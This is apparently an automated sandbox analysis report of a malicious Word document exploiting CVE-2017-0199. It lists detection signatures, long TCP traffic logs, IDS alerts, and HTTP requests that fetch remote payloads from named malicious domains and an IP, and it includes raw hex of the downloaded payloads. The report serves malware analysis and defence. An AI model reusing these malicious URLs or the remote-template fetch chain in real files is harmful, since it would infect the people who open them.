Windows Analysis Report
_________19.03.docx

Overview

General Information

Sample name: _________19.03.docx
Analysis ID: 1668984
MD5: f9026fabfb8d131863ad06fd72eb2717
SHA1: ffa14e589d99a95d025b0ae5d7122319195622f7
SHA256: 4640c58e3c658d8178f4e9d9570566040ad162e25b61a46b0be989aeb69db679
Tags: cve-2017-0199docxuser-zhuzhu0009
Infos:

Detection

Score: 68
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Contains an external reference to another file
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://clack.su/fox.docx Avira URL Cloud: Label: malware
Source: http://valisi.ru/first.rtf Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: _________19.03.docx Virustotal: Detection: 44% Perma Link
Source: _________19.03.docx ReversingLabs: Detection: 41%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll Jump to behavior
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: clack.su
Source: global traffic DNS query: name: clack.su
Source: global traffic DNS query: name: valisi.ru
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49716
Source: global traffic TCP traffic: 192.168.2.4:49716 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global traffic TCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global traffic TCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global traffic TCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global traffic TCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global traffic TCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49724 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global traffic TCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global traffic TCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global traffic TCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49719
Source: global traffic TCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49719 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49724
Source: global traffic TCP traffic: 192.168.2.4:49724 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49724 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49724
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49724
Source: global traffic TCP traffic: 192.168.2.4:49724 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49730
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49734 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49734
Source: global traffic TCP traffic: 192.168.2.4:49734 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49734 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49731
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49734
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49734
Source: global traffic TCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49734 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49735
Source: global traffic TCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49735
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49735
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49735
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49735
Source: global traffic TCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49735
Source: global traffic TCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49735
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49735
Source: global traffic TCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49735 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49724
Source: global traffic TCP traffic: 192.168.2.4:49724 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49724 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49724
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49726
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49734
Source: global traffic TCP traffic: 192.168.2.4:49734 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49734 -> 91.218.228.26:80
Source: global traffic TCP traffic: 91.218.228.26:80 -> 192.168.2.4:49734
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 91.218.228.26:80

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.4:49731 -> 91.218.228.26:80
Source: Network traffic Suricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.4:49719 -> 91.218.228.26:80
Source: Network traffic Suricata IDS: 2033858 - Severity 1 - ET MALWARE TA399/Sidewinder Activity Payload Request M2, Microsoft Office UA Request for .rtf : 192.168.2.4:49735 -> 91.218.228.26:80
Source: Network traffic Suricata IDS: 2055080 - Severity 1 - ET MALWARE TA399/Sidewinder Activity Payload Request M3, Microsoft Word UA Request for .rtf : 192.168.2.4:49734 -> 91.218.228.26:80
Source: Network traffic Suricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 91.218.228.26:80 -> 192.168.2.4:49726
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: IHCRUInternet-HostingLtdMoscowRussiaRU IHCRUInternet-HostingLtdMoscowRussiaRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /fox.docx HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: clack.suConnection: Keep-AliveCookie: PHPSESSID=b9e6303e515dc6233f459e6662a37489; wfvt_733659977=6802f1f8a0a59
Source: global traffic HTTP traffic detected: GET /first.rtf HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: valisi.ruConnection: Keep-AliveCookie: PHPSESSID=9f1887f17763dca70f238dcccd64fc52; wfvt_1026485859=6802f1fcf250d
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: application/vnd.openxmlformats-officedocument.wordprocessingml.documentlast-modified: Wed, 19 Mar 2025 11:29:09 GMTetag: "6eac-67daaa85-b8348916368e5d6e;;;"accept-ranges: bytescontent-length: 28332date: Sat, 19 Apr 2025 00:44:42 GMTserver: LiteSpeedData Raw: 50 4b 03 04 14 00 00 00 08 00 00 00 21 00 1e 91 1a b7 ea 00 00 00 4e 02 00 00 0b 00 00 00 5f 72 65 6c 73 2f 2e 72 65 6c 73 8d 92 51 4b c4 30 0c 80 df 05 ff 43 c9 fb 2d bb 13 44 e4 ba 7b 11 e1 de 44 e6 0f 08 6d b6 95 db da d2 46 bd fb f7 56 50 74 70 9e 7b 6c 9a 7c f9 12 b2 dd 1d a7 51 bd 71 ca 2e 78 0d eb aa 06 c5 de 04 eb 7c af e1 a5 7d 5c dd 81 ca 42 de d2 18 3c 6b 38 71 86 5d 73 7d b5 7d e6 91 a4 14 e5 c1 c5 ac 0a c5 67 0d 83 48 bc 47 cc 66 e0 89 72 15 22 fb f2 d3 85 34 91 94 67 ea 31 92 39 50 cf b8 a9 eb 5b 4c bf 19 d0 cc 98 6a 6f 35 a4 bd bd 01 d5 9e 22 2f 61 87 ae 73 86 1f 82 79 9d d8 cb 99 16 c8 47 61 6f d9 ae 62 2a f5 49 5c 99 46 b5 94 7a 16 0d 36 98 a7 12 ce 48 31 56 05 0d 78 de 68 b3 dc e8 ef 69 71 62 21 4b 42 68 42 e2 cb 3e 9f 19 97 84 d6 cb 85 fe 5f d1 3c e3 c7 e6 3d 24 8b f6 2b fc 6d 83 b3 2b 68 3e 00 50 4b 03 04 14 00 00 00 00 00 d9 41 73 5a 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 63 75 73 74 6f 6d 58 6d 6c 2f 5f 72 65 6c 73 2f 50 4b 03 04 14 00 00 00 08 00 00 00 21 00 74 3f 39 7a bc 00 00 00 28 01 00 00 1e 00 00 00 63 75 73 74 6f 6d 58 6d 6c 2f 5f 72 65 6c 73 2f 69 74 65 6d 31 2e 78 6d 6c 2e 72 65 6c 73 8d cf b1 8a c3 30 0c 06 e0 fd e0 de c1 68 6f 9c dc 50 ca 11 a7 4b 29 74 3b 4a 0e ba 1a 47 49 4c 63 cb 58 6a 69 df be e6 a6 2b 74 e8 28 89 ff fb 51 bb bd 85 45 5d 31 b3 a7 68 a0 a9 6a 50 18 1d 0d 3e 4e 06 7e fb fd 6a 03 8a c5 c6 c1 2e 14 d1 c0 1d 19 b6 dd e7 47 7b c4 c5 4a 09 f1 ec 13 ab a2 44 36 30 8b a4 6f ad d9 cd 18 2c 57 94 30 96 cb 48 39 58 29 63 9e 74 b2 ee 6c 27 d4 5f 75 bd d6 f9 bf 01 dd 93 a9 0e 83 81 7c 18 1a 50 fd 3d e1 3b 36 8d a3 77 b8 23 77 09 18 e5 45 85 76 17 16 0a a7 b0 fc 64 2a 8d aa b7 79 42 31 e0 05 c3 df aa a9 8a 09 ba 6b f5 d3 7f dd 03 50 4b 03 04 14 00 00 00 08 00 00 00 21 00 26 9a f9 f2 c3 00 00 00 80 01 00 00 13 00 00 00 63 75 73 74 6f 6d 58 6d 6c 2f 69 74 65 6d 31 2e 78 6d 6c a5 90 c1 0a c2 30 0c 86 5f 65 f4 ee 3a 3d a9 6c f3 22 9e 14 04 15 cf a1 cb b4 b0 36 a5 c9 44 df de aa 13 c4 83 17 2f 39 7c f9 f9 f2 93 72 71 75 5d 76 c1 c8 96 7c a5 c6 79 a1 32 f4 86 1a eb 4f 95 3a ec 57 a3 a9 ca 58 c0 37 d0 91 c7 4a dd 90 d5 a2 2e a9 17 9e a7 b1 0b 60 70 09 02 59 f2 f8 27 e2 4a 9d 45 c2 5c 6b 36 67 74 c0 b9 b3 26 12 53 2b b9 21 a7 a9 6d ad 41 3d 29 8a 99 7e c4 1f 06 ed 50 a0 49 1a 35 a8 23 76 20 d8 24 33 b2 fe 62 64 7a 87 5e be f9 16 29 74 98 60 88 14 30 ca 6d 33 38 d7 96 e5 55 ef af 66 ef 73 86 62 ec 83 bc ed 47 e0 35 b1 d4 12 7b 2c f5 af c4 b0 fd fc 5a 7d 07 50 4b 03 04 14 00 00 00 08 00 00 00 21 00 15 aa 19 12 e7 00 00 00 4d 01 00 00 18 00 00 00 63 75 73 74 6f 6d 58 6d 6c 2f 69 74 65 6d 50 72 6f 70 73 31 2e 78 6d 6c 65 90 41 6b 84 30 10 85 ef 85 fe 07 c9
Source: global traffic HTTP traffic detected: GET /fox.docx HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: clack.suConnection: Keep-AliveCookie: PHPSESSID=b9e6303e515dc6233f459e6662a37489; wfvt_733659977=6802f1f8a0a59
Source: global traffic HTTP traffic detected: GET /first.rtf HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: valisi.ruConnection: Keep-AliveCookie: PHPSESSID=9f1887f17763dca70f238dcccd64fc52; wfvt_1026485859=6802f1fcf250d
Source: global traffic DNS traffic detected: DNS query: clack.su
Source: global traffic DNS traffic detected: DNS query: valisi.ru
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/5.4.45set-cookie: wfvt_1026485859=6802f1fe1a5cc; expires=Sat, 19-Apr-2025 01:14:46 GMT; path=/; httponlycontent-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachelink: <http://valisi.ru/wp-json/>; rel="https://api.w.org/"date: Sat, 19 Apr 2025 00:44:46 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/5.4.45set-cookie: wfvt_1026485859=6802f1ff2de53; expires=Sat, 19-Apr-2025 01:14:47 GMT; path=/; httponlycontent-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachelink: <http://valisi.ru/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sat, 19 Apr 2025 00:44:47 GMTserver: LiteSpeedData Raw: 63 31 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 db 6e db ca f1 d9 fe 8a 15 0b 58 e4 09 c5 8b 44 59 8e 6c da 50 64 1b 0d 9a 34 41 ec 83 a2 b0 0d 61 4d ae a4 75 28 92 67 b9 b2 2c d8 02 8a 3e f4 3f fa 07 79 e8 01 da 87 fe 83 cf 1f 75 76 97 94 a8 8b 13 fb 24 28 60 53 e4 5e e6 3e b3 33 b3 07 95 e3 0f dd f3 bf 7e 3c 41 43 3e 8a 0e b7 0f c4 0f 8a 70 3c f0 35 36 d6 c4 00 c1 e1 e1 f6 d6 c1 88 70 8c 82 21 66 19 e1 be f6 f3 f9 69 6d 0f a6 f3 f1 18 8f 88 af dd 52 32 49 13 c6 35 14 24 31 27 31 ac 9b d0 90 0f 7d d7 75 9c d5 c5 78 cc 87 09 2b 2d ed 84 b7 38 0e 48 88 32 3e 0e 69 22 d7 73 ca 23 72 f8 f8 cf df fe fe db df 1e bf 3c fe f7 f1 df bf fd e3 f1 0b 82 97 5f c5 e3 cb e3 7f 1e ff f5 f8 ab 78 43 e8 01 a1 53 1a 8d 38 09 0e 6c b5 6f 7b 6b 89 bc b3 3f 01 9f bd f3 0f 1f de bd e9 7c 2a 21 5e 1a ef 7d ec 7c 3a 3b f9 d4 eb 7e 78 ff b1 73 fe f6 cd bb 13 0d d9 40 0a 10 53 a9 d5 50 90 65 a8 56 13 a4 45 34 fe 8c 18 89 7c 2d 03 3e 78 30 e6 88 02 db 1a 1a 32 d2 f7 b5 21 e7 69 db b6 6f 71 44 33 6a b1 b1 3d 49 6b b9 54 6c 3e 24 23 92 d9 7d 1a 71 46 32 6e f7 f1 ad d8 6a c1 43 72 2d 41 4b 30 55 01 26 03 38 7d 10 68 66 0d 92 64 10 11 9c d2 cc 0a 92 91 0d c4 1c f5 f1 88 46 53 ff 94 32 fc ea 0c c7 59 db 73 1c b3 01 ff 